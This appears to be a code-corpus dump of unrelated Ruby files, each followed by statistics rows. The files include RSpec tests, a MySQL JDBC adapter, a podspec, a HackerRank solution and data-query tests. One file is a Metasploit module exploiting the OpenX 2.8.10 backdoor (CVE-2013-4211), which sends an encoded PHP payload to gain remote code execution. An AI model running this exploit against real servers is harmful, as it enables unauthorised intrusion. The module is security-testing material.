provider.set(:volume => 'vol01')
provider.expects(:status).with('volume', 'vol01').returns quota_on
provider.expects(:resize).never
seq = sequence 'restart quota'
provider.expects(:qoff).with('volume', 'vol01').in_sequence(seq)
provider.expects(:qon).with('volume', 'vol01').in_sequence(seq)
provider.flush
end
it "should do nothing if quota is deactivated for that volume" do
provider.set(:volume => 'vol01')
provider.expects(:status).with('volume', 'vol01').returns quota_off
provider.expects(:resize).never
provider.expects(:qoff).never
provider.expects(:qon).never
provider.flush
end
end
end
end
| 34.530043 | 164 | 0.563358 |
010152669a2116279a601231663a32cb482b2c5d | 216 | module TZInfo
module Definitions
module America
module Anguilla
include TimezoneDefinition
linked_timezone 'America/Anguilla', 'America/Port_of_Spain'
end
end
end
end
| 18 | 67 | 0.662037 |
18ebd218c698b5418f04b17c72513a245990614d | 166 | # frozen_string_literal: true
require "tpm/key_attestation"
::TPM.send(:remove_const, "VENDOR_IDS")
::TPM::VENDOR_IDS = { "id:FFFFF1D0" => "FIDO Alliance" }.freeze
| 23.714286 | 63 | 0.722892 |
f7a022ce032628499473ec51baec5ace8757f139 | 40 | module MusicIds
VERSION = "0.4.0"
end
| 10 | 19 | 0.675 |
4a373c7c3dabf5f160bc6e5ff7b44150ffc0ac96 | 102 | module OpenGraphImage
class Engine < ::Rails::Engine
isolate_namespace OpenGraphImage
end
end
| 17 | 36 | 0.77451 |
ed4daa96e79724dfffa340061afe016d54336ded | 402 | =begin
see problem here: https://www.hackerrank.com/challenges/chocolate-feast
=end
#!/bin/ruby
t = gets.strip.to_i
for a0 in (0..t-1)
n,c,m = gets.strip.split(' ')
n = n.to_i
c = c.to_i
m = m.to_i
wrappers=toffees=n/c
while wrappers>=m
free_toffees = wrappers/m
toffees+=free_toffees
wrappers=free_toffees+(wrappers%m)
end
puts toffees
end | 20.1 | 71 | 0.621891 |
91322a9c9ece0ba43127f8a9628b987608ed78ce | 5,537 | # frozen_string_literal: true
ArJdbc.load_java_part :MySQL
require 'bigdecimal'
require 'active_record/connection_adapters/abstract_mysql_adapter'
require 'active_record/connection_adapters/abstract/schema_definitions'
require 'arjdbc/abstract/core'
require 'arjdbc/abstract/connection_management'
require 'arjdbc/abstract/database_statements'
require 'arjdbc/abstract/statement_cache'
require 'arjdbc/abstract/transaction_support'
module ActiveRecord
module ConnectionAdapters
AbstractMysqlAdapter.class_eval do
include ArJdbc::Abstract::Core # to have correct initialize() super
end
# Remove any vestiges of core/Ruby MySQL adapter
remove_const(:Mysql2Adapter) if const_defined?(:Mysql2Adapter)
class Mysql2Adapter < AbstractMysqlAdapter
ADAPTER_NAME = 'Mysql2'
include Jdbc::ConnectionPoolCallbacks
include ArJdbc::Abstract::ConnectionManagement
include ArJdbc::Abstract::DatabaseStatements
# NOTE: do not include MySQL::DatabaseStatements
include ArJdbc::Abstract::StatementCache
include ArJdbc::Abstract::TransactionSupport
include ArJdbc::MySQL
def initialize(connection, logger, connection_options, config)
superclass_config = config.reverse_merge(prepared_statements: false)
super(connection, logger, connection_options, superclass_config)
# configure_connection taken care of at ArJdbc::Abstract::Core
end
def self.database_exists?(config)
conn = ActiveRecord::Base.mysql2_connection(config)
conn && conn.really_valid?
rescue ActiveRecord::NoDatabaseError
false
ensure
conn.disconnect! if conn
end
def check_version
# for JNDI, don't check version as the whole connection should be lazy
return if ::ActiveRecord::ConnectionAdapters::JdbcConnection.jndi_config?(config)
super
end
def supports_json?
!mariadb? && database_version >= '5.7.8'
end
def supports_comments?
true
end
def supports_comments_in_create?
true
end
def supports_savepoints?
true
end
def supports_lazy_transactions?
true
end
def supports_transaction_isolation?
true
end
def supports_set_server_option?
false
end
# HELPER METHODS ===========================================
# from MySQL::DatabaseStatements
READ_QUERY = ActiveRecord::ConnectionAdapters::AbstractAdapter.build_read_query_regexp(
:desc, :describe, :set, :show, :use
) # :nodoc:
private_constant :READ_QUERY
def write_query?(sql) # :nodoc:
!READ_QUERY.match?(sql)
end
def explain(arel, binds = [])
sql = "EXPLAIN #{to_sql(arel, binds)}"
start = Concurrent.monotonic_time
result = exec_query(sql, "EXPLAIN", binds)
elapsed = Concurrent.monotonic_time - start
MySQL::ExplainPrettyPrinter.new.pp(result, elapsed)
end
# Reloading the type map in abstract/statement_cache.rb blows up postgres
def clear_cache!
reload_type_map
super
end
def each_hash(result) # :nodoc:
if block_given?
# FIXME: This is C in mysql2 gem and I just made simplest Ruby
result.each do |row|
new_hash = {}
row.each { |k, v| new_hash[k.to_sym] = v }
yield new_hash
end
else
to_enum(:each_hash, result)
end
end
def error_number(exception)
exception.error_code if exception.is_a?(JDBCError)
end
#--
# QUOTING ==================================================
#+
# FIXME: 5.1 crashes without this. I think this is Arel hitting a fallback path in to_sql.rb.
# So maybe an untested code path in their source. Still means we are doing something wrong to
# even hit it.
def quote(value, comment=nil)
super(value)
end
# NOTE: quote_string(string) provided by ArJdbc::MySQL (native code),
# this piece is also native (mysql2) under MRI: `@connection.escape(string)`
def quoted_date(value)
if supports_datetime_with_precision?
super
else
super.sub(/\.\d{6}\z/, '')
end
end
def _quote(value)
if value.is_a?(Type::Binary::Data)
"x'#{value.hex}'"
else
super
end
end
private :_quote
#--
# CONNECTION MANAGEMENT ====================================
#++
alias :reset! :reconnect!
#
private
# e.g. "5.7.20-0ubuntu0.16.04.1"
def full_version
schema_cache.database_version.full_version_string
end
def get_full_version
@full_version ||= @connection.full_version
end
def jdbc_connection_class(spec)
::ActiveRecord::ConnectionAdapters::MySQLJdbcConnection
end
def jdbc_column_class
::ActiveRecord::ConnectionAdapters::MySQL::Column
end
# defined in MySQL::DatabaseStatements which is not included
def default_insert_value(column)
super unless column.auto_increment?
end
# FIXME: optimize insert_fixtures_set by using JDBC Statement.addBatch()/executeBatch()
def combine_multi_statements(total_sql)
if total_sql.length == 1
total_sql.first
else
total_sql
end
end
end
end
end
| 26.878641 | 100 | 0.631931 |
62667b859f0e9652aabd46a849cf1b7691186a3e | 3,026 | ##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'OpenX Backdoor PHP Code Execution',
'Description' => %q{
OpenX Ad Server version 2.8.10 was shipped with an obfuscated
backdoor since at least November 2012 through August 2013.
Exploitation is simple, requiring only a single request with a
rot13'd and reversed payload.
},
'Author' =>
[
'egypt', # Metasploit module, shouts to bperry for hooking me up with the vuln software
'Unknown', # Someone planted this backdoor...
],
'License' => MSF_LICENSE,
'References' => [
[ 'CVE', '2013-4211' ],
[ 'OSVDB', '96073' ],
[ 'URL', 'http://www.heise.de/security/meldung/Achtung-Anzeigen-Server-OpenX-enthaelt-eine-Hintertuer-1929769.html'],
[ 'URL', 'http://forum.openx.org/index.php?showtopic=503521628'],
],
'Privileged' => false,
'Payload' =>
{
'DisableNops' => true,
# Arbitrary big number. The payload gets sent as POST data, so
# really it's unlimited
'Space' => 262144, # 256k
},
'DisclosureDate' => 'Aug 07 2013',
'Platform' => 'php',
'Arch' => ARCH_PHP,
'Targets' => [[ 'Generic (PHP payload)', { }]],
'DefaultTarget' => 0))
register_options([
OptString.new('TARGETURI', [true, "The URI to request", "/openx/"]),
], self.class)
end
def check
token = rand_text_alpha(20)
response = execute_php("echo '#{token} '.phpversion();die();")
if response.nil?
CheckCode::Unknown
elsif response.body =~ /#{token} ((:?\d\.?)+)/
vprint_status("PHP Version #{$1}")
return CheckCode::Vulnerable
end
return CheckCode::Safe
end
def exploit
execute_php(payload.encoded)
handler
end
def execute_php(php_code)
money = rot13(php_code.reverse)
begin
response = send_request_cgi( {
'method' => "POST",
'global' => true,
'uri' => normalize_uri(target_uri.path,"www","delivery","fc.php"),
'vars_get' => {
'file_to_serve' => "flowplayer/3.1.1/flowplayer-3.1.1.min.js",
'script' => 'deliveryLog:vastServeVideoPlayer:player'
},
'vars_post' => {
'vastPlayer' => money
},
}, 0.1)
rescue ::Rex::ConnectionError => e
fail_with(Failure::Unreachable, e.message)
rescue ::OpenSSL::SSL::SSLError
fail_with(Failure::BadConfig, "The target failed to negotiate SSL, is this really an SSL service?")
end
response
end
def rot13(str)
str.tr! "A-Za-z", "N-ZA-Mn-za-m"
end
end
| 29.960396 | 127 | 0.576338 |
330b6e427ca667549db42081a216d2fa6f208c02 | 1,828 | #
# Be sure to run `pod lib lint MDMultiSourceDemo.podspec' to ensure this is a
# valid spec before submitting.
#
# Any lines starting with a # are optional, but their use is encouraged
# To learn more about a Podspec see https://guides.cocoapods.org/syntax/podspec.html
#
Pod::Spec.new do |s|
s.name = 'MDMultiSourceDemo_C'
def self.smart_version
tag = `git describe --abbrev=0 --tags 2>/dev/null`.strip
if $?.success? then tag else "0.0.1" end
end
s.version = smart_version
s.summary = 'A short description of MDMultiSourceDemo_A.'
# This description is used to generate tags and improve search results.
# * Think: What does it do? Why did you write it? What is the focus?
# * Try to keep it short, snappy and to the point.
# * Write the description between the DESC delimiters below.
# * Finally, don't worry about the indent, CocoaPods strips it!
s.description = <<-DESC
TODO: Add long description of the pod here.
DESC
s.homepage = 'https://github.com/Leon0206/MDMultiSourceDemo'
# s.screenshots = 'www.example.com/screenshots_1', 'www.example.com/screenshots_2'
s.license = { :type => 'MIT', :file => 'LICENSE' }
s.author = { 'Leon0206' => '[email protected]' }
s.source = { :git => 'https://github.com/Leon0206/MDMultiSourceDemo.git', :tag => s.version.to_s }
# s.social_media_url = 'https://twitter.com/<TWITTER_USERNAME>'
s.ios.deployment_target = '9.0'
s.source_files = [
'MDMultiSourceDemo/Classes/MDMultiSourceDemo_C/**/*',
]
# s.resource_bundles = {
# 'MDMultiSourceDemo' => ['MDMultiSourceDemo/Assets/*.png']
# }
# s.public_header_files = 'Pod/Classes/**/*.h'
# s.frameworks = 'UIKit', 'MapKit'
s.dependency 'MDMultiSourceDemo_Core'
end
| 37.306122 | 110 | 0.654814 |
6a123aad1d151487777bb7392c1a75f5eae61af8 | 2,002 | require "factory_bot"
require "mockley_crew/engine"
require "mockley_crew/configuration"
require "mockley_crew/errors/connection_not_made"
require "mockley_crew/errors/database_not_found"
require "mockley_crew/errors/database_with_no_name"
require "mockley_crew/errors/invalid_data"
require "mockley_crew/errors/invalid_factory"
require "mockley_crew/errors/invalid_amount"
require "mockley_crew/database"
require "mockley_crew/factory_builder"
require "mockley_crew/data"
require "mockley_crew/mockley_crew_handled"
module MockleyCrew
class << self
attr_writer :configuration
end
def self.configuration
@configuration ||= Configuration.new
end
def self.reset_configuration
@configuration = Configuration.new
end
def self.configure
yield(configuration)
if configuration.heroku?
set_sqlite3
end
end
def self.set_sqlite3
return if defined?(SQLite3)
$: << "#{Rails.root}/vendor/gems/sqlite3/gems/sqlite3-1.3.13/lib/"
require 'sqlite3'
hack_active_record
end
def self.hack_active_record
file_path = active_record_path + "/active_record/connection_adapters/sqlite3_adapter.rb"
file_contents = File.read(file_path)
new_contents = file_contents.gsub(/gem \"sqlite3\".*$/, "")
write_to_file(file_path, new_contents)
require 'active_record/connection_adapters/sqlite3_adapter'
write_to_file(file_path, file_contents)
end
def self.load_active_record_sqlite3_adapter
require 'active_record/connection_adapters/sqlite3_adapter'
end
def self.active_record_path
(`gem which active_record`).split("/")[0..-2].join("/")
end
def self.write_to_file file, contents
File.open(file, "w+") do |f|
f.write(contents)
end
end
def self.root
File.expand_path '../..', __FILE__
end
def self.activated?
ActiveRecord::Base.connection.instance_variable_get(:@config)[:database].split("/")[0..-2].join("/") == configuration.database_files_path.gsub(/\/$/, "")
end
end
| 25.666667 | 157 | 0.744256 |
ab111cb81de7b327eb471f4a9c000fc26e0d5a9e | 12,597 | require_relative "../../test_helper"
module SmartAnswer
module Calculators
class MarriageAbroadDataQueryTest < ActiveSupport::TestCase
context MarriageAbroadDataQuery do
setup do
@data_query = MarriageAbroadDataQuery.new
end
context "#marriage_data" do
should "load data from yaml file only once" do
YAML.stubs(:load_file).returns({})
YAML.expects(:load_file).once.returns({})
@data_query.marriage_data
@data_query.marriage_data
end
should "load data from correct path leading to marriage_abroad_data.yml" do
path = Rails.root.join("lib/data/marriage_abroad_data.yml")
YAML.stubs(:load_file).returns({})
YAML.expects(:load_file).with(path).returns({})
@data_query.marriage_data
end
should "only contain pre-defined data keys" do
keys = %w(countries_with_18_outcomes countries_with_2_outcomes countries_with_2_outcomes_marriage_or_pacs countries_with_6_outcomes countries_with_ceremony_location_outcomes countries_with_1_outcome)
data = @data_query.marriage_data
assert_equal keys, data.keys
end
end
context "#countries_with_18_outcomes" do
should "returns countries that are listed to have 18 outcomes" do
YAML.stubs(:load_file).returns(countries_with_18_outcomes: %w(anguilla bermuda))
assert_equal %w(anguilla bermuda), @data_query.countries_with_18_outcomes
end
should "return empty array if no country is found" do
YAML.stubs(:load_file).returns(countries_with_18_outcomes: nil)
assert_equal [], @data_query.countries_with_18_outcomes
end
should "throw RuntimeError if data structure isn't an array of strings" do
YAML.stubs(:load_file).returns(countries_with_18_outcomes: [{ sample: "value" }])
exception = assert_raises RuntimeError do
@data_query.countries_with_18_outcomes
end
assert_equal exception.message, "Country list must be an array of strings"
end
should "throw RuntimeError if data structure is a Hash" do
YAML.stubs(:load_file).returns(countries_with_18_outcomes: Hash.new)
exception = assert_raises RuntimeError do
@data_query.countries_with_18_outcomes
end
assert_equal exception.message, "Country list must be an array of strings"
end
should "throw KeyError if countries_with_18_outcomes is missing" do
YAML.stubs(:load_file).returns({})
exception = assert_raises KeyError do
@data_query.countries_with_18_outcomes
end
assert_equal exception.message, "key not found: \"countries_with_18_outcomes\""
end
end
context "#countries_with_2_outcomes" do
should "returns countries that are listed to have 2 outcomes" do
YAML.stubs(:load_file).returns(countries_with_2_outcomes: %w(aruba bonaire-st-eustatius-saba))
assert_equal %w(aruba bonaire-st-eustatius-saba), @data_query.countries_with_2_outcomes
end
should "return empty array if no country is found" do
YAML.stubs(:load_file).returns(countries_with_2_outcomes: nil)
assert_equal [], @data_query.countries_with_2_outcomes
end
should "throw RuntimeError if data structure isn't an array of strings" do
YAML.stubs(:load_file).returns(countries_with_2_outcomes: [{ sample: "value" }])
exception = assert_raises RuntimeError do
@data_query.countries_with_2_outcomes
end
assert_equal exception.message, "Country list must be an array of strings"
end
should "throw RuntimeError if data structure is a Hash" do
YAML.stubs(:load_file).returns(countries_with_2_outcomes: Hash.new)
exception = assert_raises RuntimeError do
@data_query.countries_with_2_outcomes
end
assert_equal exception.message, "Country list must be an array of strings"
end
should "throw KeyError if countries_with_2_outcomes is missing" do
YAML.stubs(:load_file).returns({})
exception = assert_raises KeyError do
@data_query.countries_with_2_outcomes
end
assert_equal exception.message, "key not found: \"countries_with_2_outcomes\""
end
end
context "#countries_with_2_outcomes_marriage_or_pacs" do
should "returns countries that are listed to have 2 marriage or pacs outcomes" do
YAML.stubs(:load_file).returns(countries_with_2_outcomes_marriage_or_pacs: %w(monaco wallis-and-futuna new-caledonia))
assert_equal %w(monaco wallis-and-futuna new-caledonia), @data_query.countries_with_2_outcomes_marriage_or_pacs
end
should "return empty array if no country is found" do
YAML.stubs(:load_file).returns(countries_with_2_outcomes_marriage_or_pacs: nil)
assert_equal [], @data_query.countries_with_2_outcomes_marriage_or_pacs
end
should "throw RuntimeError if data structure isn't an array of strings" do
YAML.stubs(:load_file).returns(countries_with_2_outcomes_marriage_or_pacs: [{ sample: "value" }])
exception = assert_raises RuntimeError do
@data_query.countries_with_2_outcomes_marriage_or_pacs
end
assert_equal exception.message, "Country list must be an array of strings"
end
should "throw RuntimeError if data structure is a Hash" do
YAML.stubs(:load_file).returns(countries_with_2_outcomes_marriage_or_pacs: Hash.new)
exception = assert_raises RuntimeError do
@data_query.countries_with_2_outcomes_marriage_or_pacs
end
assert_equal exception.message, "Country list must be an array of strings"
end
should "throw KeyError if countries_with_2_outcomes_marriage_or_pacs is missing" do
YAML.stubs(:load_file).returns({})
exception = assert_raises KeyError do
@data_query.countries_with_2_outcomes_marriage_or_pacs
end
assert_equal exception.message, "key not found: \"countries_with_2_outcomes_marriage_or_pacs\""
end
end
context "#countries_with_6_outcomes" do
should "returns countries that are listed to have 6 outcomes" do
YAML.stubs(:load_file).returns(countries_with_6_outcomes: %w(argentina brazil))
assert_equal %w(argentina brazil), @data_query.countries_with_6_outcomes
end
should "return empty array if no country is found" do
YAML.stubs(:load_file).returns(countries_with_6_outcomes: nil)
assert_equal [], @data_query.countries_with_6_outcomes
end
should "throw RuntimeError if data structure isn't an array of strings" do
YAML.stubs(:load_file).returns(countries_with_6_outcomes: [{ sample: "value" }])
exception = assert_raises RuntimeError do
@data_query.countries_with_6_outcomes
end
assert_equal exception.message, "Country list must be an array of strings"
end
should "throw RuntimeError if data structure is a Hash" do
YAML.stubs(:load_file).returns(countries_with_6_outcomes: Hash.new)
exception = assert_raises RuntimeError do
@data_query.countries_with_6_outcomes
end
assert_equal exception.message, "Country list must be an array of strings"
end
should "throw KeyError if countries_with_6_outcomes is missing" do
YAML.stubs(:load_file).returns({})
exception = assert_raises KeyError do
@data_query.countries_with_6_outcomes
end
assert_equal exception.message, "key not found: \"countries_with_6_outcomes\""
end
end
context "#countries_with_ceremony_location_outcomes" do
should "returns countries that are listed to have ceremony location outcomes" do
YAML.stubs(:load_file).returns(countries_with_ceremony_location_outcomes: %w(finland))
assert_equal %w(finland), @data_query.countries_with_ceremony_location_outcomes
end
should "return empty array if no country is found" do
YAML.stubs(:load_file).returns(countries_with_ceremony_location_outcomes: nil)
assert_equal [], @data_query.countries_with_ceremony_location_outcomes
end
should "throw RuntimeError if data structure isn't an array of strings" do
YAML.stubs(:load_file).returns(countries_with_ceremony_location_outcomes: [{ sample: "value" }])
exception = assert_raises RuntimeError do
@data_query.countries_with_ceremony_location_outcomes
end
assert_equal exception.message, "Country list must be an array of strings"
end
should "throw RuntimeError if data structure is a Hash" do
YAML.stubs(:load_file).returns(countries_with_ceremony_location_outcomes: Hash.new)
exception = assert_raises RuntimeError do
@data_query.countries_with_ceremony_location_outcomes
end
assert_equal exception.message, "Country list must be an array of strings"
end
should "throw KeyError if countries_with_ceremony_location_outcomes is missing" do
YAML.stubs(:load_file).returns({})
exception = assert_raises KeyError do
@data_query.countries_with_ceremony_location_outcomes
end
assert_equal exception.message, "key not found: \"countries_with_ceremony_location_outcomes\""
end
end
context "#countries_with_1_outcome" do
should "returns countries that are listed to have 1 outcomes" do
YAML.stubs(:load_file).returns(countries_with_1_outcome: %w(monaco new-caledonia))
assert_equal %w(monaco new-caledonia), @data_query.countries_with_1_outcome
end
should "return empty array if no country is found" do
YAML.stubs(:load_file).returns(countries_with_1_outcome: nil)
assert_equal [], @data_query.countries_with_1_outcome
end
should "throw RuntimeError if data structure isn't an array of strings" do
YAML.stubs(:load_file).returns(countries_with_1_outcome: [{ sample: "value" }])
exception = assert_raises RuntimeError do
@data_query.countries_with_1_outcome
end
assert_equal exception.message, "Country list must be an array of strings"
end
should "throw RuntimeError if data structure is a Hash" do
YAML.stubs(:load_file).returns(countries_with_1_outcome: Hash.new)
exception = assert_raises RuntimeError do
@data_query.countries_with_1_outcome
end
assert_equal exception.message, "Country list must be an array of strings"
end
should "throw KeyError if countries_with_1_outcome is missing" do
YAML.stubs(:load_file).returns({})
exception = assert_raises KeyError do
@data_query.countries_with_1_outcome
end
assert_equal exception.message, "key not found: \"countries_with_1_outcome\""
end
end
context "#outcome_per_path_countries" do
should "return an alphabetical list of countries under all outcome groups" do
YAML.stubs(:load_file).returns(
countries_with_18_outcomes: %w(anguilla),
countries_with_6_outcomes: %w(bermuda),
countries_with_2_outcomes: %w(cayman-islands),
countries_with_2_outcomes_marriage_or_pacs: %w(monaco),
countries_with_ceremony_location_outcomes: %w(finland),
countries_with_1_outcome: %w(french-guiana),
)
assert_equal @data_query.outcome_per_path_countries,
%w(anguilla bermuda cayman-islands finland french-guiana monaco)
end
end
end
end
end
end
| 39.365625 | 211 | 0.65976 |
d5164087354fc3ed605ea70fb4b3072abe15914a | 374 | # frozen_string_literal: true
module MongoQL
class Expression::Macro < Expression
attr_accessor :name
def initialize(name)
validate!(name)
@name = name
end
def validate!(name)
raise ArgumentError, "macro #{name} is not registered!" unless MongoQL::Macro.has_macro?(name)
end
def to_ast
"$macro_#{name}"
end
end
end | 18.7 | 100 | 0.652406 |
28a66327ac5eda33e7ac233fa93e07433a600824 | 68 | module Text_Displayer
def display_text text_to_display
end
end
| 11.333333 | 34 | 0.823529 |
01163d6cf2f9793400593024e959d97479f7cee7 | 430 | require 'test_helper'
class StaticPagesControllerTest < ActionDispatch::IntegrationTest
test "should get home" do
get root_path
assert_response :success
end
test "should get help" do
get help_path
assert_response :success
end
test "should get about" do
get about_path
assert_response :success
end
test "should get contact" do
get contact_path
assert_response :success
end
end
| 16.538462 | 65 | 0.725581 |
b93b520a79092067fe94d2f5d9edf64a55c9a417 | 425 | # frozen_string_literal: true
class Item
include Searchable
extend Forwardable
def_delegators :@item, :[]=, :each, :detect
@collection = []
def initialize(item = {})
@item = item
end
def self.from(source)
items = JSON.parse(File.read(source), object_class: Item)
@collection = Array(items)
self
end
def self.filtered_by(criteria)
filter_collection(@collection, criteria)
end
end
| 17 | 61 | 0.68 |
ab7bcfc0240c1f6b03556a76d178762fafc779e3 | 1,201 | # frozen_string_literal: true
module ThemeCheck
# Reports missing content_for_header and content_for_layout in theme.liquid
class RequiredLayoutThemeObject < LiquidCheck
severity :error
category :liquid
doc docs_url(__FILE__)
LAYOUT_FILENAME = "layout/theme"
def initialize
@content_for_layout_found = false
@content_for_header_found = false
end
def on_document(node)
@layout_theme_node = node if node.theme_file.name == LAYOUT_FILENAME
end
def on_variable(node)
return unless node.value.name.is_a?(Liquid::VariableLookup)
@content_for_header_found ||= node.value.name.name == "content_for_header"
@content_for_layout_found ||= node.value.name.name == "content_for_layout"
end
def after_document(node)
return unless node.theme_file.name == LAYOUT_FILENAME
add_missing_object_offense("content_for_layout") unless @content_for_layout_found
add_missing_object_offense("content_for_header") unless @content_for_header_found
end
private
def add_missing_object_offense(name)
add_offense("#{LAYOUT_FILENAME} must include {{#{name}}}", node: @layout_theme_node)
end
end
end
| 29.292683 | 90 | 0.738551 |
b9d53f6938083ca7c3c841378b1e070d9538db82 | 359 | require 'formula'
class FbClient < Formula
homepage 'https://paste.xinu.at'
url 'https://paste.xinu.at/data/client/fb-1.1.4.tar.gz'
sha1 '03483b5cdda9d27121941ddd10ffd20967f3f63b'
conflicts_with 'findbugs',
:because => "findbugs and fb-client both install a `fb` binary"
def install
system "make", "PREFIX=#{prefix}", "install"
end
end
| 23.933333 | 67 | 0.707521 |
629429c874c941610b580e911d9aab4ead04fa27 | 767 | Pod::Spec.new do |s|
s.name = 'PusherSwift'
s.version = '7.2.0'
s.summary = 'A Pusher client library in Swift'
s.homepage = 'https://github.com/pusher/pusher-websocket-swift'
s.license = 'MIT'
s.author = { "Hamilton Chapman" => "[email protected]" }
s.source = { git: "https://github.com/pusher/pusher-websocket-swift.git", tag: s.version.to_s }
s.social_media_url = 'https://twitter.com/pusher'
s.swift_version = '4.2'
s.requires_arc = true
s.source_files = 'Sources/*.swift'
s.dependency 'ReachabilitySwift', '4.3.0'
s.dependency 'Starscream', '~> 3.0.5'
s.ios.deployment_target = '8.0'
s.osx.deployment_target = '10.10'
s.tvos.deployment_target = '9.0'
end
| 34.863636 | 107 | 0.611473 |
26e11329775113ef00714a949e32390a774c7688 | 172 | class ChangeDescriptionNullOnAnnouncementTemplates < ActiveRecord::Migration[5.0]
def change
change_column_null :announcement_templates, :description, true
end
end
| 28.666667 | 81 | 0.825581 |
03841913deab190972306e9fd8a9afe8e4ade3fd | 2,714 | #
# Copyright (C) 2013 eNovance SAS <[email protected]>
#
# Author: Emilien Macchi <[email protected]>
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# Unit tests for neutron::services::fwaas class
#
require 'spec_helper'
describe 'neutron::services::fwaas' do
let :pre_condition do
"class { 'neutron': rabbit_password => 'passw0rd' }"
end
let :params do
{}
end
let :default_params do
{ :driver => 'neutron.services.firewall.drivers.linux.iptables_fwaas.IptablesFwaasDriver',
:enabled => true,
:vpnaas_agent_package => false }
end
shared_examples_for 'neutron fwaas service plugin' do
let :params_hash do
default_params.merge(params)
end
it 'configures driver in fwaas_driver.ini' do
should contain_neutron_fwaas_service_config('fwaas/driver').with_value('neutron.services.firewall.drivers.linux.iptables_fwaas.IptablesFwaasDriver')
should contain_neutron_fwaas_service_config('fwaas/enabled').with_value('true')
end
end
context 'on Debian platforms' do
let :facts do
{ :osfamily => 'Debian' }
end
let :platform_params do
{ :l3_agent_package => 'neutron-l3-agent',
:vpnaas_agent_package => 'neutron-vpn-agent'}
end
it_configures 'neutron fwaas service plugin'
it 'installs neutron l3 agent package' do
should contain_package('neutron-l3-agent').with_ensure('present')
end
end
context 'on Debian platforms with VPNaaS' do
let :facts do
{ :osfamily => 'Debian' }
end
let :platform_params do
{ :l3_agent_package => 'neutron-l3-agent',
:vpnaas_agent_package => 'neutron-vpn-agent' }
end
let :params do
{ :vpnaas_agent_package => true }
end
it_configures 'neutron fwaas service plugin'
it 'installs neutron vpnaas agent package' do
should contain_package('neutron-vpn-agent').with_ensure('present')
end
end
context 'on Red Hat platforms' do
let :facts do
{ :osfamily => 'RedHat' }
end
let :platform_params do
{ :package_name => 'openstack-neutron' }
end
it_configures 'neutron fwaas service plugin'
end
end
| 26.871287 | 154 | 0.687546 |
d5ab038574bf8628f9ecc7aa8a1f516929536848 | 223 | class CreateRecipes < ActiveRecord::Migration[5.2]
def change
create_table :recipes do |t|
t.string :name
t.integer :creator_id
t.string :directions
t.string :total_prep_time
end
end
end
| 20.272727 | 50 | 0.668161 |
61ca6d0e288672d437d11d950ea504ed1ff0a5b3 | 2,222 | # frozen_string_literal: true
require 'rails_helper'
RSpec.describe "prisoners/show", type: :view do
let(:page) { Nokogiri::HTML(rendered) }
let(:case_info) { build(:case_information) }
let(:prison) { build(:prison) }
let(:offender) { build(:mpc_offender, prison: prison, offender: case_info.offender, prison_record: api_offender) }
before do
assign(:prison, prison)
assign(:prisoner, offender)
assign(:tasks, [])
assign(:keyworker, build(:keyworker))
end
describe 'complexity badges' do
let(:prison) { build(:womens_prison) }
let(:api_offender) { build(:hmpps_api_offender, complexityLevel: complexity) }
let(:test_strategy) { Flipflop::FeatureSet.current.test! }
before do
render
end
context 'with low complexity' do
let(:complexity) { 'low' }
it 'shows low complexity badge' do
expect(page).to have_content 'LOW COMPLEXITY'
end
end
context 'with medium complexity' do
let(:complexity) { 'medium' }
it 'shows medium complexity badge' do
expect(page).to have_content 'MEDIUM COMPLEXITY'
end
end
context 'with high complexity' do
let(:complexity) { 'high' }
it 'shows high complexity badge' do
expect(page).to have_content 'HIGH COMPLEXITY'
end
end
end
describe 'offender category' do
subject { page.css('#category-code').text }
before { render }
context "with a male category" do
let(:api_offender) { build(:hmpps_api_offender, category: build(:offender_category, :cat_a)) }
it 'shows the category label' do
expect(subject).to eq('Cat A')
end
end
context "with a female category" do
let(:api_offender) { build(:hmpps_api_offender, category: build(:offender_category, :female_closed)) }
it 'shows the category label' do
expect(subject).to eq('Female Closed')
end
end
context 'when category is unknown' do
# This happens when an offender's category assessment hasn't been completed yet
let(:api_offender) { build(:hmpps_api_offender, category: nil) }
it 'shows "Unknown"' do
expect(subject).to eq('Unknown')
end
end
end
end
| 26.771084 | 116 | 0.656166 |
7a155f161b8359f9fd065a6bed46de9754245529 | 443 | class CreateReviews < ActiveRecord::Migration[5.2]
def change
create_table :reviews, id: :uuid do |t|
t.text :content
t.integer :stars
t.uuid :customer_id
t.uuid :worker_id
t.belongs_to :customer, foreign_key: {to_table: :users}, type: :uuid
t.belongs_to :worker, foreign_key: {to_table: :users}, type: :uuid
t.references :job,type: :uuid, foreign_key: true
t.timestamps
end
end
end
| 29.533333 | 74 | 0.654628 |
1cb4d97ed902189dc96b94f1f983b5ec98aa088c | 479 | require 'spec_helper'
module Brightcontent
describe ModelExtensions do
let(:columns) { ["id", "name", "body", "created_at", "updated_at", "featured"] }
subject(:blog) { Blog }
its(:brightcontent_columns) { should eq columns }
context "with extra method" do
before { Blog.add_brightcontent_column("test_column") }
its(:brightcontent_columns) { should eq columns + ["test_column"] }
its(:column_names) { should eq columns }
end
end
end
| 29.9375 | 85 | 0.672234 |
ab01ab816f2e9bc6bccf08492f61862a0da9353b | 132 | require 'test_helper'
class RegionDistrictNameTest < ActiveSupport::TestCase
# test "the truth" do
# assert true
# end
end
| 16.5 | 54 | 0.727273 |
7989f11ec6e7c2747db097b4bca5607f1f93d895 | 12,621 | # frozen_string_literal: true
require 'csv'
namespace :touhou_music_discover do
namespace :export do
desc 'Touhou music with original songs file export'
task touhou_music_with_original_songs: :environment do
File.open('tmp/touhou_music_with_original_songs.tsv', 'w') do |f|
f.puts("jan\tisrc\ttrack_number\tspotify_album_id\tspotify_track_id\tspotify_album_name\tspotify_track_name\tapple_music_album_id\tapple_music_track_id\tapple_music_album_name\tapple_music_track_name\toriginal_songs")
Album.includes(:spotify_album, :apple_music_album, tracks: %i[spotify_tracks apple_music_tracks]).order(jan_code: :asc).each do |album|
jan = album.jan_code
# 特定のアルバムのみ出力する場合、コメントをオフにする
# next if jan != ''
apple_music_album = album.apple_music_album
apple_music_album_id = apple_music_album&.apple_music_id
apple_music_album_name = apple_music_album&.name
